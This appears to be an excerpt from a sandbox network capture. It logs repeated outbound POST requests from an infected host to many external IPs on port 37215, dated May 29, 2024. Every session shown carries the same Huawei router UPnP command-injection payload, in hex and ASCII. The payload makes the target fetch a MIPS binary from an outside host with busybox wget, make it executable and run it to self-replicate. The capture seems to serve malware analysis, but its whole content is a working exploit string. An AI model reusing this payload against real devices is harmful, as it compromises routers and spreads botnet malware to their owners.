                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  760192.168.2.1353980157.200.162.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.415927887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  761192.168.2.1354768220.179.61.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.415950060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  762192.168.2.1355940157.92.78.18337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416059971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  763192.168.2.1360712197.150.194.1337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416078091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  764192.168.2.135722641.75.71.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416100979 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  765192.168.2.1337804197.77.104.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416102886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  766192.168.2.1354674193.88.91.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416285038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  767192.168.2.135120441.66.235.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416465998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  768192.168.2.133558041.45.98.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416523933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  769192.168.2.1353222197.43.187.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.416536093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 